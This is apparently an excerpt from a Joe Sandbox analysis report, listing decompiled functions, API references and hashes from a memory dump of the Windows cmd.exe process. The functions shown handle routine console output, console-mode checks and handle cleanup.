0x001cbfd4
0x001cbfdb
0x001cbfdd
0x001cbfe4
0x001cbfe6
0x001cbff7
0x001cbffc
0x001cbffc
0x001cbfe4
0x001cbfff
0x001cc00b
0x00000000
0x001be656
0x001be659
0x001be794
0x00000000
0x001be65f
0x001be65f
0x001be663
0x00000000
0x001be663
0x001be659
0x001be640
0x001be614
0x001cbea5
0x001cbeab
0x001cbeab
0x001cbeac
0x001cbeae
0x001cbeae
0x001cbeb1
0x001cbeb1
0x001cbeb1
0x001cbeb6
0x001be621
0x00000000

APIs

_tell.MSVCRT ref: 001BE5F9
_close.MSVCRT ref: 001BE62C
memset.MSVCRT ref: 001BE6CC
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 001BE736
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001E3840), ref: 001BE747
??_V@YAXPAX@Z.MSVCRT ref: 001BE772

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleInfoOutput_close_tellmemset
String ID:
API String ID: 1380661413-0
Opcode ID: a8d3f95395a2cb5cc922a94be0bbdb66967b8db0f28323453334eb70fbb16a25
Instruction ID: 5b9245d35cb0e929801d6a658481dfd0caa70bdb8dd3add8d330d314e4e307fe
Opcode Fuzzy Hash: a8d3f95395a2cb5cc922a94be0bbdb66967b8db0f28323453334eb70fbb16a25
Instruction Fuzzy Hash: 3D412830905640CBDB34DF28D889BAAB7E2AFA4714F14052DE855C76E1EB30DC85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001C2616 Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E001C2616(long __ecx, DWORD* __edx) {
				void _v8;
				void* _t4;
				long _t5;
				int _t21;
				long _t43;

				_push(__ecx);
				_t40 = __edx;
				_t43 = 0;
				if(__edx <= 0) {
					L5:
					_t5 = _t43;
					L6:
					return _t5;
				}
				if(E001C269C(_t4) != 0) {
					__imp__AcquireSRWLockShared(0x1f7f20);
					_t7 =  &_v8;
					__imp___get_osfhandle(0);
					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
					if(_t21 == 0) {
						_t43 = GetLastError();
					}
					__imp__ReleaseSRWLockShared(0x1f7f20);
				} else {
					_t40 = __edx + __edx;
					_t21 = E001C27C8( &_v8, __ecx, _t40,  &_v8);
				}
				if(_t21 == 0 || _v8 != _t40) {
					_t43 = GetLastError();
					if(_t43 == 0) {
						_t43 = 0x70;
					}
					if(E001C0178(_t10) == 0) {
						if(E001D9953(_t11, 1) == 0) {
							E001D985A(_t43);
						} else {
							_push(0);
							_push(0x2364);
							E001BC5A2(1);
						}
						_t5 = 1;
						goto L6;
					} else {
						_push(0);
						_push(0x1d);
						E001BC5A2(1);
						goto L5;
					}
				} else {
					goto L5;
				}
			}

0x001c261b
0x001c261f
0x001c2621
0x001c2627
0x001c2659
0x001c2659
0x001c265b
0x001c2661
0x001c2661
0x001c2633
0x001c2667
0x001c266f
0x001c2677
0x001c2685
0x001c2689
0x001cd681
0x001cd681
0x001c2694
0x001c2635
0x001c2638
0x001c2646
0x001c2646
0x001c264a
0x001cd68e
0x001cd692
0x001cd696
0x001cd696
0x001cd6a3
0x001cd6be
0x001cd6d2
0x001cd6c0
0x001cd6c0
0x001cd6c2
0x001cd6c7
0x001cd6cd
0x001cd6d7
0x00000000
0x001cd6a5
0x001cd6a5
0x001cd6a7
0x001cd6a9
0x00000000
0x001cd6af
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 001C269C: _get_osfhandle.MSVCRT ref: 001C26A7
Part of subcall function 001C269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001BC5F8,?,?,?), ref: 001C26B6
Part of subcall function 001C269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26D2
Part of subcall function 001C269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000002), ref: 001C26E1
Part of subcall function 001C269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001C26EC
Part of subcall function 001C269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26F5

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000000,?,?,001EB980,00000002,00000000,?,001C9CA6,%s %s ,?,00000000,00000000), ref: 001C2667
_get_osfhandle.MSVCRT ref: 001C2677
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001C9CA6,%s %s ,?,00000000,00000000), ref: 001C267F
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001C2694

Part of subcall function 001C27C8: _get_osfhandle.MSVCRT ref: 001C27DB
Part of subcall function 001C27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001EB980,000000FF,001DD620,00002000,00000000,00000000), ref: 001C281C
Part of subcall function 001C27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001DD620,-00000001,?,00000000), ref: 001C2831

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
String ID:
API String ID: 4057327938-0
Opcode ID: 03994c1149a7b0a34c79a0f05997bf5a3cda7e2c52f31a7db1f16ef71da2f60d
Instruction ID: f3f2451c53a92dbf31c4994eac4bb2229ff9235e51f2e8cfc48167919d188169
Opcode Fuzzy Hash: 03994c1149a7b0a34c79a0f05997bf5a3cda7e2c52f31a7db1f16ef71da2f60d
Instruction Fuzzy Hash: 5721A532744325ABD72876B96C86F7A669CCBB5751F11003DFA0AD62C1EF70DC40C661

Uniqueness

Uniqueness Score: -1.00%

Function 001C27C8 Relevance: 9.1, APIs: 6, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E001C27C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
				void* _v8;
				long _v12;
				long _v16;
				long _t15;
				void* _t17;
				void* _t24;
				DWORD* _t29;
				long _t31;
				long _t32;

				_t31 = _a4;
				_t23 = __edx;
				_v16 = _t31;
				__imp___get_osfhandle(_t24);
				_v8 = __eax;
				if( *0x1f805c != 0) {
					return WriteFile(__eax, __edx, _t31, _a8, 0);
				}
				_t29 = _a8;
				while(_t31 > 0x2000) {
					_t15 = WideCharToMultiByte( *0x1e3854, 0, _t23, 0x1000, 0x1dd620, 0x2000, 0, 0);
					_v12 = _t15;
					_t23 =  &(_t23[0x1000]);
					_t31 = _t31 - 0x2000;
					if(WriteFile(_v8, 0x1dd620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
						L9:
						_t17 = 0;
						L7:
						return _t17;
					} else {
						continue;
					}
				}
				if(_t31 == 0) {
					L6:
					 *_t29 = _v16;
					_t17 = 1;
					goto L7;
				}
				_t5 = WideCharToMultiByte( *0x1e3854, 0, _t23, 0xffffffff, 0x1dd620, 0x2000, 0, 0) - 1; // -1
				_t32 = _t5;
				if(WriteFile(_v8, 0x1dd620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
					goto L9;
				} else {
					goto L6;
				}
			}

0x001c27d2
0x001c27d5
0x001c27d8
0x001c27db
0x001c27e9
0x001c27ec
0x00000000
0x001cd70d
0x001c27f3
0x001c27f6
0x001cd730
0x001cd747
0x001cd74a
0x001cd74c
0x001cd756
0x001c2850
0x001c2850
0x001c2847
0x00000000
0x001cd767
0x00000000
0x001cd767
0x001cd756
0x001c2805
0x001c283f
0x001c2842
0x001c2846
0x00000000
0x001c2846
0x001c2825
0x001c2825
0x001c2839
0x00000000
0x00000000
0x00000000
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 001C27DB
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001EB980,000000FF,001DD620,00002000,00000000,00000000), ref: 001C281C
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001DD620,-00000001,?,00000000), ref: 001C2831
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001EB980,?,?,00000000), ref: 001CD70D
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,001EB980,00001000,001DD620,00002000,00000000,00000000,00000000), ref: 001CD730
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,001DD620,00000000,?,00000000), ref: 001CD74E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
String ID:
API String ID: 3249344982-0
Opcode ID: 2bd7ce8d657aaf3c66a6d8ed15d2ec3e78df7533d0e46abbb7abd33957a245a1
Instruction ID: dea4793280697cc9b14fa9bb00d65ffa0c2a41f0c8e600a11ac454f30009f7ae
Opcode Fuzzy Hash: 2bd7ce8d657aaf3c66a6d8ed15d2ec3e78df7533d0e46abbb7abd33957a245a1
Instruction Fuzzy Hash: E2219571A84305BBEB205F64AC49F7ABBBCEB54750F204129F915A72D0DB70DD40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 001D265F Relevance: 9.1, APIs: 6, Instructions: 82
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E001D265F(int* __ecx) {
				void** _v0;
				void* _v8;
				int _t18;
				void** _t29;
				void** _t32;
				void* _t39;
				void* _t42;

				_push(__ecx);
				_t39 = __ecx;
				_t2 = _t39 + 4; // 0x4
				_t29 = _t2;
				_t32 = _t29;
				E001D2D6D(_t32,  &_v8);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t42 = _v8;
					goto L18;
				} else {
					_t33 = __ecx[2];
					if(__ecx[2] != 0) {
						E001D2DB4(_t33);
					}
					_t42 = 0;
					 *(_t39 + 8) = 0;
					_t34 =  *(_t39 + 0xc);
					if( *(_t39 + 0xc) != 0) {
						E001D2DB4(_t34);
					}
					_t35 = _v8;
					 *(_t39 + 0xc) = _t42;
					if(_v8 != 0) {
						E001D2DE9(_t35);
					}
					_t18 = E001D25D6(_t35);
					if(_t18 == 0) {
						_t8 = _t39 + 0x18; // 0x18
						_t32 = _t8;
						E001D170A(_t32);
						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
							L10:
							_push(_t32);
							L11:
							_t32 = _v0;
							E001D2D56();
						}
						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
							goto L10;
						}
						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
							goto L10;
						}
						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
						L18:
						if(_t42 != 0) {
							_t18 = ReleaseMutex(_t42);
							if(_t18 == 0) {
								_push(_t32);
								goto L11;
							}
						}
					}
				}
				return _t18;
			}

0x001d2664
0x001d2668
0x001d2670
0x001d2670
0x001d2674
0x001d2676
0x001d267d
0x001d2680
0x001d2682
0x001d2718
0x00000000
0x001d2688
0x001d2688
0x001d268d
0x001d268f
0x001d268f
0x001d2694
0x001d2696
0x001d2699
0x001d269e
0x001d26a0
0x001d26a0
0x001d26a5
0x001d26a8
0x001d26ad
0x001d26af
0x001d26af
0x001d26b4
0x001d26bb
0x001d26bd
0x001d26bd
0x001d26c0
0x001d26c8
0x001d26d7
0x001d26d7
0x001d26dd
0x001d26dd
0x001d26e0
0x001d26e0
0x001d26e8
0x00000000
0x00000000
0x001d26f9
0x00000000
0x00000000
0x001d2710
0x001d271b
0x001d271d
0x001d2720
0x001d2728
0x001d272a
0x00000000
0x001d272b
0x001d2728
0x001d271d
0x001d26bb
0x001d2738

APIs

Part of subcall function 001D2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,001D1838,?), ref: 001D2D7C

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 001D26CD

Part of subcall function 001D2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,001D26A5,?), ref: 001D2DBD
Part of subcall function 001D2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,001D26A5,?), ref: 001D2DC6
Part of subcall function 001D2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,001D26A5,?), ref: 001D2DDF

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001D26ED
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001D26FD
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 001D2709
RtlFreeHeap.NTDLL(00000000), ref: 001D2710
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 001D2720

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
String ID:
API String ID: 2383944720-0
Opcode ID: e777019e49ff05bb53d87fcba32f68533fab7ed9e9dca454ae232c81f8712f96
Instruction ID: 96213cb1a5049c77428f521d38d874f10ed48782ab47c58e8389643486f0b12f
Opcode Fuzzy Hash: e777019e49ff05bb53d87fcba32f68533fab7ed9e9dca454ae232c81f8712f96
Instruction Fuzzy Hash: 8821AF30601616ABCB29AF66D848E7AB779FF70711710822BF82587B10DB30EC91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D6E90 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

_wcsicmp.MSVCRT ref: 001D6EFC
_wcsicmp.MSVCRT ref: 001D6F1B
_wcsicmp.MSVCRT ref: 001D6F41

Strings

LIST, xrefs: 001D6F3B
OFF, xrefs: 001D6F14, 001D6F19
KEYS, xrefs: 001D6F2F

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsicmpwcschr$iswspace
String ID: KEYS$LIST$OFF
API String ID: 3924973218-4129271751
Opcode ID: 423f3f50efe99e48c4c527a4b3a455eab72c12954334cc4ce5b5d9ca9c42ccf7
Instruction ID: 1cf8dcbaf68cb8e8decfd83435a7596d7fa405d82e573e96013254efdfcbe23c
Opcode Fuzzy Hash: 423f3f50efe99e48c4c527a4b3a455eab72c12954334cc4ce5b5d9ca9c42ccf7
Instruction Fuzzy Hash: 25112932208B01ABA318A73AEC668B7B3A8FB98760361801FF503966C2DF715D41C665

Uniqueness

Uniqueness Score: -1.00%

Function 001C6CE1 Relevance: 9.1, APIs: 6, Instructions: 79
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E001C6CE1(void* __eax) {
				void** _v0;
				void* _v8;
				int _t19;
				void** _t30;
				void* _t32;
				void** _t33;
				void* _t40;
				void* _t43;

				_t32 =  *0x1dd010; // 0x0
				if(_t32 != 0) {
					_push(_t32);
					_t40 = _t32;
					_t2 = _t40 + 4; // 0x4
					_t30 = _t2;
					_t33 = _t30;
					E001D2D6D(_t33,  &_v8);
					_t19 =  *_t40 - 1;
					 *_t40 = _t19;
					if(_t19 != 0) {
						_t43 = _v8;
						goto L20;
					} else {
						_t34 =  *(_t40 + 8);
						if( *(_t40 + 8) != 0) {
							E001D2DB4(_t34);
						}
						_t43 = 0;
						 *(_t40 + 8) = 0;
						_t35 =  *(_t40 + 0xc);
						if( *(_t40 + 0xc) != 0) {
							E001D2DB4(_t35);
						}
						_t36 = _v8;
						 *(_t40 + 0xc) = _t43;
						if(_v8 != 0) {
							E001D2DE9(_t36);
						}
						_t19 = E001D25D6(_t36);
						if(_t19 == 0) {
							_t8 = _t40 + 0x18; // 0x18
							_t33 = _t8;
							E001D170A(_t33);
							if( *(_t40 + 0xc) != _t43 && CloseHandle( *(_t40 + 0xc)) == 0) {
								L12:
								_push(_t33);
								L13:
								_t33 = _v0;
								E001D2D56();
							}
							if( *(_t40 + 8) != _t43 && CloseHandle( *(_t40 + 8)) == 0) {
								goto L12;
							}
							if( *_t30 != _t43 && CloseHandle( *_t30) == 0) {
								goto L12;
							}
							_t19 = RtlFreeHeap(GetProcessHeap(), _t43, _t40);
							L20:
							if(_t43 != 0) {
								_t19 = ReleaseMutex(_t43);
								if(_t19 == 0) {
									_push(_t33);
									goto L13;
								}
							}
						}
					}
					return _t19;
				} else {
					return __eax;
				}
			}

0x001c6ce1
0x001c6ce9
0x001d2664
0x001d2668
0x001d2670
0x001d2670
0x001d2674
0x001d2676
0x001d267d
0x001d2680
0x001d2682
0x001d2718
0x00000000
0x001d2688
0x001d2688
0x001d268d
0x001d268f
0x001d268f
0x001d2694
0x001d2696
0x001d2699
0x001d269e
0x001d26a0
0x001d26a0
0x001d26a5
0x001d26a8
0x001d26ad
0x001d26af
0x001d26af
0x001d26b4
0x001d26bb
0x001d26bd
0x001d26bd
0x001d26c0
0x001d26c8
0x001d26d7
0x001d26d7
0x001d26dd
0x001d26dd
0x001d26e0
0x001d26e0
0x001d26e8
0x00000000
0x00000000
0x001d26f9
0x00000000
0x00000000
0x001d2710
0x001d271b
0x001d271d
0x001d2720
0x001d2728
0x001d272a
0x00000000
0x001d272b
0x001d2728
0x001d271d
0x001d26bb
0x001d2738
0x001c6cef
0x001c6cef
0x001c6cef

APIs

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 001D26CD
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001D26ED
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 001D26FD
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 001D2709
RtlFreeHeap.NTDLL(00000000), ref: 001D2710
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 001D2720

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseHandle$Heap$FreeMutexProcessRelease
String ID:
API String ID: 1689195821-0
Opcode ID: 91f83f5c53b450190ea09880ecc537cfef68bc7157b11a9943c8a312e4b587af
Instruction ID: 57ac9481d13235b9c5ac3bb931d6448b4512af67b0ca370198ab1a26d2530997
Opcode Fuzzy Hash: 91f83f5c53b450190ea09880ecc537cfef68bc7157b11a9943c8a312e4b587af
Instruction Fuzzy Hash: 80218370201616ABDB29EF65D858E7AB779FF70700710812BF87582B10DB30EC51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C0178 Relevance: 9.1, APIs: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E001C0178(void* __eax) {
				long _v8;
				int _t12;
				signed int _t14;
				void* _t15;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t28;

				_t24 = _t18;
				__imp___get_osfhandle(_t24, _t20, _t23, _t18);
				_t21 = __eax;
				if((GetFileType(__eax) & 0xffff7fff) == 2) {
					_t25 = _t24;
					if(_t25 == 0) {
						_t21 = GetStdHandle(0xfffffff6);
						L6:
						L7:
						__imp__AcquireSRWLockShared(0x1f7f20, _t15);
						_t12 = GetConsoleMode(_t21,  &_v8);
						__imp__ReleaseSRWLockShared(0x1f7f20);
						_t14 = 1;
						if(_t12 == 0) {
							 *0x1f3aa0 =  *0x1f3aa0 & 0x00000000;
						} else {
							if((_v8 & 0x00000007) == 0) {
								if((_v8 & 0x00000003) != 0) {
									 *0x1f3aa0 = 2;
								}
							} else {
								 *0x1f3aa0 = 1;
							}
						}
						goto L2;
					}
					_t28 = _t25 - 1;
					if(_t28 != 0) {
						if(_t28 != 1) {
							goto L7;
						}
						_t21 = GetStdHandle(0xfffffff4);
					} else {
						_t21 = GetStdHandle(0xfffffff5);
					}
					goto L6;
				} else {
					 *0x1f3aa0 =  *0x1f3aa0 & 0x00000000;
					_t14 = 0;
					L2:
					return _t14;
				}
			}

0x001c017f
0x001c0183
0x001c018a
0x001c019b
0x001c01ac
0x001c01af
0x001c01be
0x001c01b8
0x001c01c0
0x001c01c7
0x001c01d2
0x001c01db
0x001c01e3
0x001c01e7
0x001c01fa
0x001c01e9
0x001c01ed
0x001cca01
0x001cca07
0x001cca07
0x001c01f3
0x001c01f3
0x001c01f3
0x001c01ed
0x00000000
0x001c01e7
0x001c01b1
0x001c01b4
0x001c0206
0x00000000
0x00000000
0x001c01be
0x001c01b6
0x001c01be
0x001c01be
0x00000000
0x001c019d
0x001c019d
0x001c01a4
0x001c01a6
0x001c01ab
0x001c01ab

APIs

_get_osfhandle.MSVCRT ref: 001C0183
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CD6A1), ref: 001C018D
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001C01B8
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000001), ref: 001C01C7
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001C01D2
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20), ref: 001C01DB

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: a2778f0f719f126488db4de4b72528299b038c230949372f96831264033b1989
Instruction ID: 513067e784c53e9372eccaf6f796d21f8708a93c47e206029885d1fb84faa3a7
Opcode Fuzzy Hash: a2778f0f719f126488db4de4b72528299b038c230949372f96831264033b1989
Instruction Fuzzy Hash: E111E373808251EBEB1697789D0DF7A76ECE769325F29032DE826D28A0CB34CD81C251

Uniqueness

Uniqueness Score: -1.00%

Function 001C269C Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E001C269C(void* __eax) {
				long _v8;
				void* _t3;
				int _t8;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t23;

				_t19 = _t13;
				__imp___get_osfhandle(_t19, _t15, _t18, _t13);
				_t16 = __eax;
				if(__eax == 0xffffffff || (GetFileType(__eax) & 0xffff7fff) != 2) {
					L7:
					_t3 = 0;
				} else {
					_t21 = _t19;
					if(_t21 == 0) {
						_t16 = GetStdHandle(0xfffffff6);
						goto L5;
					} else {
						_t23 = _t21 - 1;
						if(_t23 != 0) {
							if(_t23 != 1) {
								goto L6;
							} else {
								_t16 = GetStdHandle(0xfffffff4);
								goto L5;
							}
							L13:
						} else {
							_t16 = GetStdHandle(0xfffffff5);
							L5:
						}
					}
					L6:
					__imp__AcquireSRWLockShared(0x1f7f20, _t10);
					_t8 = GetConsoleMode(_t16,  &_v8);
					__imp__ReleaseSRWLockShared(0x1f7f20);
					if(_t8 != 0) {
						_t3 = 1;
					} else {
						goto L7;
					}
				}
				return _t3;
				goto L13;
			}

0x001c26a3
0x001c26a7
0x001c26ad
0x001c26b3
0x001c2700
0x001c2700
0x001c26c6
0x001c26c6
0x001c26c9
0x001c26d8
0x00000000
0x001c26cb
0x001c26cb
0x001c26ce
0x001c2710
0x00000000
0x001c2712
0x001c26d8
0x00000000
0x001c26d8
0x00000000
0x001c26d0
0x001c26d8
0x001c26d2
0x001c26d8
0x001c26ce
0x001c26da
0x001c26e1
0x001c26ec
0x001c26f5
0x001c26fe
0x001c270a
0x00000000
0x00000000
0x00000000
0x001c26fe
0x001c2707
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 001C26A7
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001BC5F8,?,?,?), ref: 001C26B6
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26D2
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,00000002), ref: 001C26E1
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001C26EC
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001F7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001BC5C6), ref: 001C26F5

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: bdf4315ef9623e341dd0a2cfe2e17089e261dda22405c5eb891ef530af3e7b42
Instruction ID: 829fd11ef31a6a13e68c093f890bd97767249f3393866b3b5881659f5db3749b
Opcode Fuzzy Hash: bdf4315ef9623e341dd0a2cfe2e17089e261dda22405c5eb891ef530af3e7b42
Instruction Fuzzy Hash: 300167378146656B8B2427789D8CF7A369CE775371B250329FC25D29D0DF34CD8581A1

Uniqueness

Uniqueness Score: -1.00%

Function 001BFE10 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E001BFE10(void* __ebx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t38;
				signed int _t49;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t73;
				signed int _t75;
				void* _t78;
				signed int _t79;
				short* _t80;
				signed int _t83;
				void* _t89;
				signed int _t91;
				signed int _t93;
				void* _t95;
				void* _t99;
				signed int _t102;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;
				void* _t121;

				_t121 = _t120 - 0x14;
				_push(_t113);
				_t79 = 0x4002;
				_t35 = E001C00B0(0x4002);
				_v8 = _t35;
				_t104 = _t35;
				if(_t35 == 0) {
					memset(0x1e3890, 0, 0x4006);
					_t121 = _t121 + 0xc;
					 *0x1eb8a4 = 0x1e3892;
					__imp__longjmp(0x1eb8f8, 0xffffffff);
					goto L37;
				} else {
					_t113 =  *0x1eb8a4;
					_t102 = 0x2001;
					_t79 = _t35;
					_t78 = _t113 - _t35;
					while(1) {
						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
						if(_t2 == 0) {
							break;
						}
